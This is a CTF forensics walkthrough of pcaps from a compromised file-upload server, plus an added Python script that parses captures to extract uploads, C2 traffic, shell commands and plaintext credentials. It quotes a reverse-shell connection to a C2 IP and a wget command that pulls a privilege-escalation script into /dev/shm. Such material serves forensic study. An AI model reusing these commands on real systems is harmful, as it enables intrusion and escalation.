👮♂️SFF CTF 25
SkillsFuture CTF 2025 - forensics-style CTF challenges
On 19th July I participated in the SkillsFuture (SFF) CTF open category and got 3rd place after solving all the challenges in 19 minutes and 43 seconds.
The background context for the CTF is that you are doing forensics work for a police station, and a file upload server has been compromised. The challenges are sequential: you have to solve the current challenge to unlock the next one.
We are first given a pcap file containing the network traffic between the file upload server and the public.
Suspicious file name
We are told to look for a suspicious file upload and to submit the name of that file as the answer to the first challenge. Open the pcap in Wireshark and apply a display filter that narrows the traffic down to HTTP file uploads:

Going to the second-last entry and looking under HTTP File Data, we can see that the malicious file uploaded was hell0fr13nd.py:

C2 Server IP address and Port
For the second question we are told that the malicious file makes the server establish a connection to a C2 server, and we are asked for the IP address and port of that server. This information is in the same packet: the uploaded script's source, visible in the file data, connects to IP address 3.237.200.21 on port 1234.
Command used to download file from C2 server
For the third question we are asked for the command run on the file upload server to retrieve a file from the C2 server. For this we need to change the filter to show only the HTTP requests and responses exchanged with the C2 server, using http && ip.addr == 3.237.200.21 as the filter.

We can see that the server retrieves linuxprivchecker.py via a GET request to the C2 server, but we still do not know the command that issued the request. The command itself was typed into the reverse shell, not sent over HTTP, so we apply the filter ip.addr == 3.237.200.21 && tcp.port == 1234 to see the shell channel and find it:

So the command used was wget http://3.237.200.21:8000/linuxprivchecker.py -O /dev/shm/linuxprivchecker.py. Note that the C2 host is serving the file over HTTP on port 8000, separate from the shell channel on port 1234, which is why the GET request appeared under the http filter while the command only appears in the port-1234 stream. The file is written to /dev/shm, a tmpfs, so it never touches the disk.
Part 2 - Web server credentials
For the next part, we need to find the credentials used to access a web server at http://3.86.60.136/
To do this, we are given a bunch of pcaps and are told that one of them contains the network traffic from when an admin logged in to the server. The quickest approach is to cd into the folder containing all the pcaps and run strings * | grep username. This works only because the login went over plain HTTP, so the form fields are in the clear inside the packet payloads; over TLS the same grep would find nothing.
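Everything above can also be done without clicking through Wireshark. The following is an added example written for this page, not tooling from the writeup: a standard-library-only Python script that parses a classic pcap (Ethernet/IPv4/TCP only), concatenates each TCP flow direction in capture order, and answers the same four questions programmatically. The capture it runs on is constructed inline. The server address 10.0.0.5, the uploader 203.0.113.9, the external client 198.51.100.7 and the credentials admin / example-only are assumptions; the C2 host 3.237.200.21, ports 1234 and 8000, the web server 3.86.60.136, the filename hell0fr13nd.py and the wget command are taken from the writeup.

```python
import re
import struct
from collections import defaultdict

# --- constructed sample capture (assumptions marked) ------------------------
SERVER = "10.0.0.5"        # assumption: the compromised upload server
UPLOADER = "203.0.113.9"   # assumption: whoever uploaded the script
C2 = "3.237.200.21"        # from the writeup
WEB = "3.86.60.136"        # from the writeup


def _ip(addr):
    return bytes(int(o) for o in addr.split("."))


def build_frame(src, sport, dst, dport, payload):
    """Ethernet + IPv4 + TCP (PSH/ACK) frame; checksums are left zero, the parser never checks them."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0x4000, 64, 6, 0, _ip(src), _ip(dst))
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    return b"\x00" * 12 + b"\x08\x00" + ip_hdr + tcp_hdr + payload


def build_pcap(frames):
    """Little-endian classic pcap, linktype 1 (Ethernet); timestamps are just the frame index."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out


UPLOAD_BODY = (b'------b\r\nContent-Disposition: form-data; name="file"; filename="hell0fr13nd.py"\r\n'
               b'Content-Type: text/x-python\r\n\r\nimport socket\ns = socket.socket()\n'
               b's.connect(("3.237.200.21", 1234))\n\r\n------b--\r\n')
SAMPLE_PCAP = build_pcap([
    build_frame(UPLOADER, 51000, SERVER, 80, b"POST /upload HTTP/1.1\r\nHost: files\r\n"
                b"Content-Type: multipart/form-data; boundary=----b\r\n\r\n" + UPLOAD_BODY),
    build_frame(SERVER, 80, UPLOADER, 51000, b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok"),
    build_frame(SERVER, 40000, C2, 1234, b"$ "),  # reverse-shell prompt, victim -> C2
    build_frame(C2, 1234, SERVER, 40000, b"wget http://3.237.200.21:8000/linuxprivchecker.py"
                b" -O /dev/shm/linuxprivchecker.py\n"),  # operator's command, C2 -> victim
    build_frame(SERVER, 40001, C2, 8000, b"GET /linuxprivchecker.py HTTP/1.1\r\nHost: 3.237.200.21:8000\r\n\r\n"),
    build_frame(C2, 8000, SERVER, 40001, b"HTTP/1.0 200 OK\r\n\r\n#!/usr/bin/env python\n"),
    build_frame("198.51.100.7", 52000, WEB, 80, b"POST /login HTTP/1.1\r\nHost: 3.86.60.136\r\n"
                b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                b"username=admin&password=example-only\r\n"),  # constructed, not the real creds
])


# --- parsing ----------------------------------------------------------------
def iter_tcp_payloads(pcap):
    """Yield (src, sport, dst, dport, payload) for every TCP segment that carries data."""
    magic, = struct.unpack_from("<I", pcap, 0)
    end = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}[magic]  # KeyError on pcapng or unknown input
    off = 24
    while off + 16 <= len(pcap):
        incl_len, = struct.unpack_from(end + "I", pcap, off + 8)
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if frame[12:14] != b"\x08\x00":  # EtherType: not IPv4
            continue
        ip = frame[14:]
        if ip[0] >> 4 != 4 or ip[9] != 6:  # not IPv4 / not TCP
            continue
        ihl, total = (ip[0] & 0x0F) * 4, struct.unpack_from("!H", ip, 2)[0]
        tcp = ip[ihl:total]
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            src, dst = (".".join(map(str, ip[i:i + 4])) for i in (12, 16))
            yield src, sport, dst, dport, payload


def reassemble(pcap):
    """Concatenate payloads per flow direction in capture order (no seq-number reordering)."""
    streams = defaultdict(bytes)
    for src, sp, dst, dp, data in iter_tcp_payloads(pcap):
        streams[(src, sp, dst, dp)] += data
    return streams


# --- the four questions -----------------------------------------------------
UPLOAD_RE = re.compile(rb'Content-Disposition: form-data;[^\r\n]*filename="([^"]+)"')
HTTP_REQ_RE = re.compile(rb"(GET|POST|PUT) (\S+) HTTP/1\.[01]")
CRED_RE = re.compile(rb"username=([^&\s]+)&password=([^&\s]+)")


def find_uploaded_files(streams):
    """Filenames declared in multipart POST bodies (what Wireshark shows under HTTP File Data)."""
    return [m.decode() for data in streams.values() if data.startswith(b"POST ")
            for m in UPLOAD_RE.findall(data)]


def find_outbound_non_http(streams, server_ip):
    """Flows the server opened (ephemeral source port >= 32768, a crude heuristic) that are not HTTP."""
    return sorted({(dst, dp) for (src, sp, dst, dp), data in streams.items()
                   if src == server_ip and sp >= 32768 and not HTTP_REQ_RE.match(data)})


def find_shell_commands(streams, c2_ip, c2_port):
    """Lines the C2 side sent down the shell channel, i.e. the operator's commands."""
    return [ln.decode(errors="replace").strip()
            for (src, sp, dst, dp), data in streams.items() if (src, sp) == (c2_ip, c2_port)
            for ln in data.splitlines() if ln.strip()]


def find_http_requests(streams, host_ip):
    """(port, method, path) of every HTTP request sent to host_ip."""
    return sorted((dp, m.group(1).decode(), m.group(2).decode())
                  for (src, sp, dst, dp), data in streams.items() if dst == host_ip
                  for m in [HTTP_REQ_RE.match(data)] if m)


def find_credentials(streams):
    """Plaintext form logins; only works because the login went over http://, not TLS."""
    return [(dst, u.decode(), p.decode()) for (src, sp, dst, dp), data in streams.items()
            for u, p in CRED_RE.findall(data)]


if __name__ == "__main__":
    s = reassemble(SAMPLE_PCAP)
    print(find_uploaded_files(s), find_outbound_non_http(s, SERVER),
          find_shell_commands(s, C2, 1234), find_http_requests(s, C2), find_credentials(s))
```

The reassembly deliberately ignores sequence numbers, retransmissions and out-of-order segments, and the "server-initiated" check is a port heuristic rather than SYN tracking, so on a real multi-gigabyte capture use Wireshark's Follow TCP Stream or tshark for the reassembly and keep only the extraction logic above.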

Secret message
For the last part, we are asked for the secret message displayed by the web server. We log in and see the message U3VwZXIgQ29uZmlkZW50aWFs. This is not the answer itself, but the trailing-less block of [A-Za-z0-9] characters in a length that is a multiple of four is a strong hint that it is base64; decoding it gives the actual message: Super Confidential
That concludes the CTF! It was quite easy to solve (especially so with ChatGPT) but I was slowed down by my unfamiliarity with Wireshark. :)